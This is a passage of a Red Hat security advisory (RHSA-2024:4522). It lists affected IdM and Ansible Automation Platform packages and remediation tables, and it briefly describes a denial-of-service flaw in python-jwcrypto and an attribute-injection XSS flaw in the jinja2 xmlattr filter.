"AppStream-8.10.0.Z.MAIN.EUS:ipa-healthcheck-core-0:0.12-3.module+el8.9.0+19634+c162f948.noarch::idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-healthcheck-core-0:0.12-3.module+el8.9.0+19692+fac39a03.noarch::idm:client",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-python-compat-0:4.9.13-9.module+el8.10.0+21691+df63127d.noarch::idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-python-compat-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.noarch::idm:client",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-selinux-0:4.9.13-9.module+el8.10.0+21691+df63127d.noarch::idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-selinux-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.noarch::idm:client",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-server-0:4.9.13-9.module+el8.10.0+21691+df63127d.aarch64::idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-server-0:4.9.13-9.module+el8.10.0+21691+df63127d.ppc64le::idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-server-0:4.9.13-9.module+el8.10.0+21691+df63127d.s390x::idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-server-0:4.9.13-9.module+el8.10.0+21691+df63127d.x86_64::idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-server-common-0:4.9.13-9.module+el8.10.0+21691+df63127d.noarch::idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-server-debuginfo-0:4.9.13-9.module+el8.10.0+21691+df63127d.aarch64::idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-server-debuginfo-0:4.9.13-9.module+el8.10.0+21691+df63127d.ppc64le::idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-server-debuginfo-0:4.9.13-9.module+el8.10.0+21691+df63127d.s390x::idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-server-debuginfo-0:4.9.13-9.module+el8.10.0+21691+df63127d.x86_64::idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-server-dns-0:4.9.13-9.module+el8.10.0+21691+df63127d.noarch::idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-server-trust-ad-0:4.9.13-9.module+el8.10.0+21691+df63127d.aarch64::idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-server-trust-ad-0:4.9.13-9.module+el8.10.0+21691+df63127d.ppc64le::idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-server-trust-ad-0:4.9.13-9.module+el8.10.0+21691+df63127d.s390x::idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-server-trust-ad-0:4.9.13-9.module+el8.10.0+21691+df63127d.x86_64::idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-server-trust-ad-debuginfo-0:4.9.13-9.module+el8.10.0+21691+df63127d.aarch64::idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-server-trust-ad-debuginfo-0:4.9.13-9.module+el8.10.0+21691+df63127d.ppc64le::idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-server-trust-ad-debuginfo-0:4.9.13-9.module+el8.10.0+21691+df63127d.s390x::idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-server-trust-ad-debuginfo-0:4.9.13-9.module+el8.10.0+21691+df63127d.x86_64::idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:opendnssec-0:2.1.7-1.module+el8.9.0+18911+94941f82.aarch64::idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:opendnssec-0:2.1.7-1.module+el8.9.0+18911+94941f82.ppc64le::idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:opendnssec-0:2.1.7-1.module+el8.9.0+18911+94941f82.s390x::idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:opendnssec-0:2.1.7-1.module+el8.9.0+18911+94941f82.src::idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:opendnssec-0:2.1.7-1.module+el8.9.0+18911+94941f82.x86_64::idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:opendnssec-debuginfo-0:2.1.7-1.module+el8.9.0+18911+94941f82.aarch64::idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:opendnssec-debuginfo-0:2.1.7-1.module+el8.9.0+18911+94941f82.ppc64le::idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:opendnssec-debuginfo-0:2.1.7-1.module+el8.9.0+18911+94941f82.s390x::idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:opendnssec-debuginfo-0:2.1.7-1.module+el8.9.0+18911+94941f82.x86_64::idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:opendnssec-debugsource-0:2.1.7-1.module+el8.9.0+18911+94941f82.aarch64::idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:opendnssec-debugsource-0:2.1.7-1.module+el8.9.0+18911+94941f82.ppc64le::idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:opendnssec-debugsource-0:2.1.7-1.module+el8.9.0+18911+94941f82.s390x::idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:opendnssec-debugsource-0:2.1.7-1.module+el8.9.0+18911+94941f82.x86_64::idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:python-jwcrypto-0:0.5.0-2.module+el8.10.0+21691+df63127d.src::idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:python-jwcrypto-0:0.5.0-2.module+el8.10.0+21692+c9b201bc.src::idm:client",
"AppStream-8.10.0.Z.MAIN.EUS:python-kdcproxy-0:0.4-5.module+el8.9.0+18911+94941f82.src::idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:python-qrcode-0:5.1-12.module+el8.9.0+18911+94941f82.src::idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:python-qrcode-0:5.1-12.module+el8.9.0+18920+2223d05e.src::idm:client",
"AppStream-8.10.0.Z.MAIN.EUS:python-yubico-0:1.3.2-9.1.module+el8.9.0+18911+94941f82.src::idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:python-yubico-0:1.3.2-9.1.module+el8.9.0+18920+2223d05e.src::idm:client",
"AppStream-8.10.0.Z.MAIN.EUS:python3-custodia-0:0.6.0-3.module+el8.9.0+18911+94941f82.noarch::idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:python3-ipaclient-0:4.9.13-9.module+el8.10.0+21691+df63127d.noarch::idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:python3-ipaclient-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.noarch::idm:client",
"AppStream-8.10.0.Z.MAIN.EUS:python3-ipalib-0:4.9.13-9.module+el8.10.0+21691+df63127d.noarch::idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:python3-ipalib-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.noarch::idm:client",
"AppStream-8.10.0.Z.MAIN.EUS:python3-ipaserver-0:4.9.13-9.module+el8.10.0+21691+df63127d.noarch::idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:python3-ipatests-0:4.9.13-9.module+el8.10.0+21691+df63127d.noarch::idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:python3-jwcrypto-0:0.5.0-2.module+el8.10.0+21691+df63127d.noarch::idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:python3-jwcrypto-0:0.5.0-2.module+el8.10.0+21692+c9b201bc.noarch::idm:client",
"AppStream-8.10.0.Z.MAIN.EUS:python3-kdcproxy-0:0.4-5.module+el8.9.0+18911+94941f82.noarch::idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:python3-pyusb-0:1.0.0-9.1.module+el8.9.0+18911+94941f82.noarch::idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:python3-pyusb-0:1.0.0-9.1.module+el8.9.0+18920+2223d05e.noarch::idm:client",
"AppStream-8.10.0.Z.MAIN.EUS:python3-qrcode-0:5.1-12.module+el8.9.0+18911+94941f82.noarch::idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:python3-qrcode-0:5.1-12.module+el8.9.0+18920+2223d05e.noarch::idm:client",
"AppStream-8.10.0.Z.MAIN.EUS:python3-qrcode-core-0:5.1-12.module+el8.9.0+18911+94941f82.noarch::idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:python3-qrcode-core-0:5.1-12.module+el8.9.0+18920+2223d05e.noarch::idm:client",
"AppStream-8.10.0.Z.MAIN.EUS:python3-yubico-0:1.3.2-9.1.module+el8.9.0+18911+94941f82.noarch::idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:python3-yubico-0:1.3.2-9.1.module+el8.9.0+18920+2223d05e.noarch::idm:client",
"AppStream-8.10.0.Z.MAIN.EUS:pyusb-0:1.0.0-9.1.module+el8.9.0+18911+94941f82.src::idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:pyusb-0:1.0.0-9.1.module+el8.9.0+18920+2223d05e.src::idm:client",
"AppStream-8.10.0.Z.MAIN.EUS:slapi-nis-0:0.60.0-4.module+el8.10.0+20723+03062ebd.aarch64::idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:slapi-nis-0:0.60.0-4.module+el8.10.0+20723+03062ebd.ppc64le::idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:slapi-nis-0:0.60.0-4.module+el8.10.0+20723+03062ebd.s390x::idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:slapi-nis-0:0.60.0-4.module+el8.10.0+20723+03062ebd.src::idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:slapi-nis-0:0.60.0-4.module+el8.10.0+20723+03062ebd.x86_64::idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:slapi-nis-debuginfo-0:0.60.0-4.module+el8.10.0+20723+03062ebd.aarch64::idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:slapi-nis-debuginfo-0:0.60.0-4.module+el8.10.0+20723+03062ebd.ppc64le::idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:slapi-nis-debuginfo-0:0.60.0-4.module+el8.10.0+20723+03062ebd.s390x::idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:slapi-nis-debuginfo-0:0.60.0-4.module+el8.10.0+20723+03062ebd.x86_64::idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:slapi-nis-debugsource-0:0.60.0-4.module+el8.10.0+20723+03062ebd.aarch64::idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:slapi-nis-debugsource-0:0.60.0-4.module+el8.10.0+20723+03062ebd.ppc64le::idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:slapi-nis-debugsource-0:0.60.0-4.module+el8.10.0+20723+03062ebd.s390x::idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:slapi-nis-debugsource-0:0.60.0-4.module+el8.10.0+20723+03062ebd.x86_64::idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:softhsm-0:2.6.0-5.module+el8.9.0+18911+94941f82.aarch64::idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:softhsm-0:2.6.0-5.module+el8.9.0+18911+94941f82.ppc64le::idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:softhsm-0:2.6.0-5.module+el8.9.0+18911+94941f82.s390x::idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:softhsm-0:2.6.0-5.module+el8.9.0+18911+94941f82.src::idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:softhsm-0:2.6.0-5.module+el8.9.0+18911+94941f82.x86_64::idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:softhsm-debuginfo-0:2.6.0-5.module+el8.9.0+18911+94941f82.aarch64::idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:softhsm-debuginfo-0:2.6.0-5.module+el8.9.0+18911+94941f82.ppc64le::idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:softhsm-debuginfo-0:2.6.0-5.module+el8.9.0+18911+94941f82.s390x::idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:softhsm-debuginfo-0:2.6.0-5.module+el8.9.0+18911+94941f82.x86_64::idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:softhsm-debugsource-0:2.6.0-5.module+el8.9.0+18911+94941f82.aarch64::idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:softhsm-debugsource-0:2.6.0-5.module+el8.9.0+18911+94941f82.ppc64le::idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:softhsm-debugsource-0:2.6.0-5.module+el8.9.0+18911+94941f82.s390x::idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:softhsm-debugsource-0:2.6.0-5.module+el8.9.0+18911+94941f82.x86_64::idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:softhsm-devel-0:2.6.0-5.module+el8.9.0+18911+94941f82.aarch64::idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:softhsm-devel-0:2.6.0-5.module+el8.9.0+18911+94941f82.ppc64le::idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:softhsm-devel-0:2.6.0-5.module+el8.9.0+18911+94941f82.s390x::idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:softhsm-devel-0:2.6.0-5.module+el8.9.0+18911+94941f82.x86_64::idm:DL1"
]
}
],
"threats": [
{
"category": "impact",
"details": "Moderate"
}
],
"title": "python-jwcrypto: malicious JWE token can cause denial of service"
}
]
}
RHSA-2024:4522
Vulnerability from csaf_redhat - Published: 2024-07-12 01:43 - Updated: 2026-06-27 18:20An uncontrolled resource consumption vulnerability was found in python-jwcrypto. If a malicious JWE token with a high compression ratio is passed to the server, the server will consume a lot of memory and processing time, leading to a denial of service.
| Product | Identifier | Version | Remediation |
|---|---|---|---|
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.4:automation-controller-venv-tower-0:4.5.8-1.el8ap.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.4:automation-controller-venv-tower-0:4.5.8-1.el8ap.ppc64le | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.4:automation-controller-venv-tower-0:4.5.8-1.el8ap.s390x | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.4:automation-controller-venv-tower-0:4.5.8-1.el8ap.x86_64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.4:automation-controller-venv-tower-0:4.5.8-1.el9ap.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.4:automation-controller-venv-tower-0:4.5.8-1.el9ap.ppc64le | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.4:automation-controller-venv-tower-0:4.5.8-1.el9ap.s390x | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.4:automation-controller-venv-tower-0:4.5.8-1.el9ap.x86_64 | — |
Vendor Fix
fix
Workaround
|
| Product | Identifier | Version | Remediation |
|---|---|---|---|
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.4-Developer-1.1:ansible-core-1:2.15.12-1.el8ap.noarch | — |
Workaround
|
|
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.4-Developer-1.1:ansible-core-1:2.15.12-1.el8ap.src | — |
Workaround
|
|
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-0:4.5.8-1.el8ap.src | — |
Workaround
|
|
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-cli-0:4.5.8-1.el8ap.noarch | — |
Workaround
|
|
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.4-Inside-1.2:ansible-core-1:2.15.12-1.el8ap.noarch | — |
Workaround
|
|
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.4-Inside-1.2:ansible-core-1:2.15.12-1.el8ap.src | — |
Workaround
|
|
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.4:aap-metrics-utility-0:0.3.0-1.el8ap.aarch64 | — |
Workaround
|
|
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.4:aap-metrics-utility-0:0.3.0-1.el8ap.ppc64le | — |
Workaround
|
|
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.4:aap-metrics-utility-0:0.3.0-1.el8ap.s390x | — |
Workaround
|
|
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.4:aap-metrics-utility-0:0.3.0-1.el8ap.src | — |
Workaround
|
|
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.4:aap-metrics-utility-0:0.3.0-1.el8ap.x86_64 | — |
Workaround
|
|
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.4:ansible-core-1:2.15.12-1.el8ap.noarch | — |
Workaround
|
|
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.4:ansible-core-1:2.15.12-1.el8ap.src | — |
Workaround
|
|
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.4:ansible-test-1:2.15.12-1.el8ap.noarch | — |
Workaround
|
|
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.4:automation-controller-0:4.5.8-1.el8ap.aarch64 | — |
Workaround
|
|
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.4:automation-controller-0:4.5.8-1.el8ap.ppc64le | — |
Workaround
|
|
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.4:automation-controller-0:4.5.8-1.el8ap.s390x | — |
Workaround
|
|
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.4:automation-controller-0:4.5.8-1.el8ap.src | — |
Workaround
|
|
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.4:automation-controller-0:4.5.8-1.el8ap.x86_64 | — |
Workaround
|
|
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.4:automation-controller-cli-0:4.5.8-1.el8ap.noarch | — |
Workaround
|
|
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.4:automation-controller-server-0:4.5.8-1.el8ap.noarch | — |
Workaround
|
|
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.4:automation-controller-ui-0:4.5.8-1.el8ap.noarch | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.4-Developer-1.1:ansible-core-1:2.15.12-1.el9ap.noarch | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.4-Developer-1.1:ansible-core-1:2.15.12-1.el9ap.src | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-0:4.5.8-1.el9ap.src | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-cli-0:4.5.8-1.el9ap.noarch | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.4-Inside-1.2:ansible-core-1:2.15.12-1.el9ap.noarch | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.4-Inside-1.2:ansible-core-1:2.15.12-1.el9ap.src | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.4:aap-metrics-utility-0:0.3.0-1.el9ap.aarch64 | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.4:aap-metrics-utility-0:0.3.0-1.el9ap.ppc64le | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.4:aap-metrics-utility-0:0.3.0-1.el9ap.s390x | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.4:aap-metrics-utility-0:0.3.0-1.el9ap.src | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.4:aap-metrics-utility-0:0.3.0-1.el9ap.x86_64 | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.4:ansible-core-1:2.15.12-1.el9ap.noarch | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.4:ansible-core-1:2.15.12-1.el9ap.src | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.4:ansible-test-1:2.15.12-1.el9ap.noarch | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.4:automation-controller-0:4.5.8-1.el9ap.aarch64 | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.4:automation-controller-0:4.5.8-1.el9ap.ppc64le | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.4:automation-controller-0:4.5.8-1.el9ap.s390x | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.4:automation-controller-0:4.5.8-1.el9ap.src | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.4:automation-controller-0:4.5.8-1.el9ap.x86_64 | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.4:automation-controller-cli-0:4.5.8-1.el9ap.noarch | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.4:automation-controller-server-0:4.5.8-1.el9ap.noarch | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.4:automation-controller-ui-0:4.5.8-1.el9ap.noarch | — |
Workaround
|
A flaw was found in jinja2. The `xmlattr` filter accepts keys containing non-attribute characters. XML/HTML attributes cannot contain spaces, `/`, `>`, or `=`, as each would then be interpreted as starting a separate attribute. If an application accepts keys (as opposed to only values) as user input, and renders these in pages that other users see as well, an attacker could inject other attributes and perform cross-site scripting (XSS).
| Product | Identifier | Version | Remediation |
|---|---|---|---|
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.4:automation-controller-venv-tower-0:4.5.8-1.el8ap.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.4:automation-controller-venv-tower-0:4.5.8-1.el8ap.ppc64le | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.4:automation-controller-venv-tower-0:4.5.8-1.el8ap.s390x | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.4:automation-controller-venv-tower-0:4.5.8-1.el8ap.x86_64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.4:automation-controller-venv-tower-0:4.5.8-1.el9ap.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.4:automation-controller-venv-tower-0:4.5.8-1.el9ap.ppc64le | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.4:automation-controller-venv-tower-0:4.5.8-1.el9ap.s390x | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.4:automation-controller-venv-tower-0:4.5.8-1.el9ap.x86_64 | — |
Vendor Fix
fix
Workaround
|
| Product | Identifier | Version | Remediation |
|---|---|---|---|
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.4-Developer-1.1:ansible-core-1:2.15.12-1.el8ap.noarch | — |
Workaround
|
|
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.4-Developer-1.1:ansible-core-1:2.15.12-1.el8ap.src | — |
Workaround
|
|
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-0:4.5.8-1.el8ap.src | — |
Workaround
|
|
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-cli-0:4.5.8-1.el8ap.noarch | — |
Workaround
|
|
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.4-Inside-1.2:ansible-core-1:2.15.12-1.el8ap.noarch | — |
Workaround
|
|
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.4-Inside-1.2:ansible-core-1:2.15.12-1.el8ap.src | — |
Workaround
|
|
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.4:aap-metrics-utility-0:0.3.0-1.el8ap.aarch64 | — |
Workaround
|
|
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.4:aap-metrics-utility-0:0.3.0-1.el8ap.ppc64le | — |
Workaround
|
|
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.4:aap-metrics-utility-0:0.3.0-1.el8ap.s390x | — |
Workaround
|
|
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.4:aap-metrics-utility-0:0.3.0-1.el8ap.src | — |
Workaround
|
|
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.4:aap-metrics-utility-0:0.3.0-1.el8ap.x86_64 | — |
Workaround
|
|
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.4:ansible-core-1:2.15.12-1.el8ap.noarch | — |
Workaround
|
|
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.4:ansible-core-1:2.15.12-1.el8ap.src | — |
Workaround
|
|
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.4:ansible-test-1:2.15.12-1.el8ap.noarch | — |
Workaround
|
|
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.4:automation-controller-0:4.5.8-1.el8ap.aarch64 | — |
Workaround
|
|
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.4:automation-controller-0:4.5.8-1.el8ap.ppc64le | — |
Workaround
|
|
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.4:automation-controller-0:4.5.8-1.el8ap.s390x | — |
Workaround
|
|
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.4:automation-controller-0:4.5.8-1.el8ap.src | — |
Workaround
|
|
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.4:automation-controller-0:4.5.8-1.el8ap.x86_64 | — |
Workaround
|
|
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.4:automation-controller-cli-0:4.5.8-1.el8ap.noarch | — |
Workaround
|
|
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.4:automation-controller-server-0:4.5.8-1.el8ap.noarch | — |
Workaround
|
|
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.4:automation-controller-ui-0:4.5.8-1.el8ap.noarch | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.4-Developer-1.1:ansible-core-1:2.15.12-1.el9ap.noarch | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.4-Developer-1.1:ansible-core-1:2.15.12-1.el9ap.src | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-0:4.5.8-1.el9ap.src | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-cli-0:4.5.8-1.el9ap.noarch | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.4-Inside-1.2:ansible-core-1:2.15.12-1.el9ap.noarch | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.4-Inside-1.2:ansible-core-1:2.15.12-1.el9ap.src | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.4:aap-metrics-utility-0:0.3.0-1.el9ap.aarch64 | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.4:aap-metrics-utility-0:0.3.0-1.el9ap.ppc64le | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.4:aap-metrics-utility-0:0.3.0-1.el9ap.s390x | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.4:aap-metrics-utility-0:0.3.0-1.el9ap.src | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.4:aap-metrics-utility-0:0.3.0-1.el9ap.x86_64 | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.4:ansible-core-1:2.15.12-1.el9ap.noarch | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.4:ansible-core-1:2.15.12-1.el9ap.src | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.4:ansible-test-1:2.15.12-1.el9ap.noarch | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.4:automation-controller-0:4.5.8-1.el9ap.aarch64 | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.4:automation-controller-0:4.5.8-1.el9ap.ppc64le | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.4:automation-controller-0:4.5.8-1.el9ap.s390x | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.4:automation-controller-0:4.5.8-1.el9ap.src | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.4:automation-controller-0:4.5.8-1.el9ap.x86_64 | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.4:automation-controller-cli-0:4.5.8-1.el9ap.noarch | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.4:automation-controller-server-0:4.5.8-1.el9ap.noarch | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.4:automation-controller-ui-0:4.5.8-1.el9ap.noarch | — |
Workaround
|
